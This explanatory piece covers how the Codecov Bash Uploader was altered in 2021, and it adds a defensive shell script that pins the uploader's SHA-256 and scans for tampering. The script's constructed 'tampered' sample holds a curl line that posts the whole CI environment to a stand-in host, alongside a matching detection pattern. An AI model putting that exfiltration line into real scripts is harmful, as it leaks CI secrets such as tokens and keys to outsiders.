How did the hackers gain access to Codecov?
The attackers, who have not been publicly identified, gained access through an error in Codecov's Docker image creation process. That error let them extract the credential needed to modify the Bash Uploader script; it did not, by itself, give them access to customer environments.
With that credential in hand, the third party made periodic, unauthorized alterations to the script beginning January 31, 2021. Because customers fetched and ran the script directly from Codecov, every altered version was able to export information from those customers' continuous integration (CI) environments.
The code coverage platform relies on a Bash Uploader: a shell script that detects the CI environment, gathers coverage reports, and uploads them to Codecov. The uploader runs inside the customer's CI job, so it inherits that job's environment, including any variables holding keys, credentials, and tokens. By modifying the script, the attackers could read that environment and send it elsewhere.
Specifically, the altered uploader contained an added line that posted the job's environment to a server at an IP address under the attackers' control rather than to Codecov. The diff published in Codecov's advisory shows that single added line, which is why the recommended check for affected customers was to compare the uploader they had run against a known-good copy.
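Two controls that follow directly from the mechanism described above, written here as an added example rather than Codecov's own code or tooling: pin the fetched uploader to a known SHA-256 and refuse to run it on mismatch (Codecov's post-incident guidance was to check the uploader against its published SHA256SUM before executing it), and scan the fetched script for the tamper pattern this incident exhibited, a curl call that ships $(env) to a host the vendor does not own. The two script bodies, the 203.0.113.10 documentation address, and the function names are all constructed for illustration; the pinned digest is computed from the clean stand-in because no real published sum applies to it.

```shell
#!/bin/sh
# Added example, not Codecov's uploader or tooling. Two checks a CI job can
# apply to a fetched shell uploader before executing it:
#   1. refuse to run it unless its SHA-256 matches a pinned value, and
#   2. flag lines that ship the process environment to an HTTP endpoint.
# Both script bodies below are constructed stand-ins; 203.0.113.10 is a
# documentation address, not a real attacker host.
set -u

# Portable SHA-256 of a file: coreutils sha256sum, else BSD/macOS shasum.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Run $1 only if its digest equals the pinned value $2.
# Returns 0 after running it, 1 (without executing anything) on mismatch.
verify_and_run() {
    script="$1"; expected="$2"
    actual="$(sha256_of "$script")"
    if [ "$actual" != "$expected" ]; then
        echo "refusing to run $script: sha256 $actual != pinned $expected" >&2
        return 1
    fi
    sh "$script"
}

# Print how many lines both invoke curl and expand the whole environment,
# the shape of the change made to the uploader. 0 means nothing found.
count_env_exfil() {
    grep -Ec 'curl .*\$\(env\)' "$1" || true
}

WORKDIR="$(mktemp -d)"

# Constructed stand-in for a clean uploader: detect the CI, gather, upload.
cat >"$WORKDIR/good.sh" <<'EOF'
#!/bin/sh
CI_NAME="${CI_NAME:-local}"
echo "uploading coverage report from $CI_NAME"
EOF

# Same script with one added line of the kind described above: the job's
# environment (tokens, keys) is POSTed to a host the vendor does not own.
cat >"$WORKDIR/tampered.sh" <<'EOF'
#!/bin/sh
CI_NAME="${CI_NAME:-local}"
curl -sm 0.5 -d "$(env)" http://203.0.113.10/upload || true
echo "uploading coverage report from $CI_NAME"
EOF

# In a real pipeline the pinned digest comes from the vendor's published
# SHA256SUM for a specific release, fetched out of band, never from the
# script being checked. Here it is computed from the clean stand-in.
PINNED="$(sha256_of "$WORKDIR/good.sh")"

verify_and_run "$WORKDIR/good.sh" "$PINNED"
verify_and_run "$WORKDIR/tampered.sh" "$PINNED" || echo "tampered copy rejected"
echo "suspicious lines in tampered copy: $(count_env_exfil "$WORKDIR/tampered.sh")"
```

The digest check is the control that would have stopped this incident: a pipeline that pins the uploader's hash runs nothing the vendor did not publish, however the vendor's copy was altered. The grep is only a retrospective aid for deciding whether a copy that was already executed had the added line; a different exfiltration shape would not match it, so it is no substitute for pinning.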
Compromising a trusted supplier or vendor in order to reach that vendor's customers is known as a supply chain attack. Such attacks are now common, and they are evolving faster than most organizations' detection and prevention efforts.